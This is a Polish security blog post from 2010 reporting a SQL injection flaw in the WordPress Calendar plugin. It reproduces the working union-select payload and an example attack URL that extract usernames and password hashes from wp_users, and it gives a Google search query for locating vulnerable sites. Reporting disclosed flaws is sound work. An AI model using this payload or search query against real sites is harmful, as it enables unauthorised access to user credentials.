31 stycznia 2010
WordPress Calendar Plugin podatny na atak Sql Injection!
niedziela, stycznia 31, 2010 | Autor:
\m/ojtek
Grupa hakerów określająca się mianem Sec Attack Team opublikował dziś szczegółowe informacje dotyczące luki odkrytej we wtyczce WordPress Calendar. Znaleziony błąd pozwala na wykonanie ataku typu Sql Injection i w konsekwencji nieuprawniony dostęp do bazy danych.
Libańska grupa Sec Attack Team przedstawiła następujące możliwości wykorzystania podatności wtyczki:
- www.site.com/?event_id=[kod Sql]
- www.site.com/Path/?event_id=[kod Sql]
Sam kod pozwalający na wyciągnięcie z bazy danych informacji o poświadczeniach użytkowników wygląda następująco:
null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users
Przykładowy atak może więc przyjąć postać następującego odwołania do serwisu internetowego:
http://server/calendar?event_id=-27+union+select+ 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users
Warto również nadmienić, że do odnalezienia witryn podatnych na ten konkretny atak może posłużyć odpowiednio skonstruowane zapytanie do wyszukiwarki Google, w postaci "powered by WordPress" inurl:"/?event_id=". Zapytanie takie zwraca na chwilę obecną 2240 wyników.
WordPress Calendar Plugin podatny na atak Sql Injection!
2010-01-31T23:14:00+01:00
\m/ojtek
Bezpieczeństwo aplikacji|Bezpieczeństwo danych|Etyczny hacking|Newsy|Obrona - Atak|Sieci komputerowe|
Subskrybuj:
Komentarze do posta (Atom)
Wyszukaj w HCSL:
Subskrybuj:
Najpopularniejsze artykuły wszech czasów:
- Urządzenia do kopiowania kart płatniczych
- Co tak naprawdę ujawniasz w Internecie?
- Dlaczego należy zasłaniać klawiaturę bankomatu?
- Publiczna wiadomość z ukrytym przekazem
- Przyszłość antywirusów jest jasna
- Sposób na obejście internetowych blokad
- Superbezpieczne hasła na... żółtej karteczce
- Funkcje sprzętowego kasowania danych w HDD!
- 12-latek odkrył krytyczną lukę w Firefoksie
- Przestępstwo nie popłaca
- Czy jesteśmy inwigilowani przez chiński sprzęt?
- Gotowy zestaw do podsłuchiwania GSM
- Jak działa internetowa mafia?
- Uwaga na nowy rodzaj ataków phishingowych!
- Microsoftowy poradnik dla organów ścigania!
- Polski super-bezpieczny system Qubes OS
- Dane wieczyście dostępne
- Pierwszy atak samochodowych crackerów
- Pliki PDF zdolne do wykonania dowolnego kodu
- Polskie służby współpracują z firmą Google?
- Więzienie za odmowę ujawnienia hasła
- Podrzucanie dziecięcej pornografii
- Zapomniany film o hakerach
- Łamanie haseł w Windows Vista i 7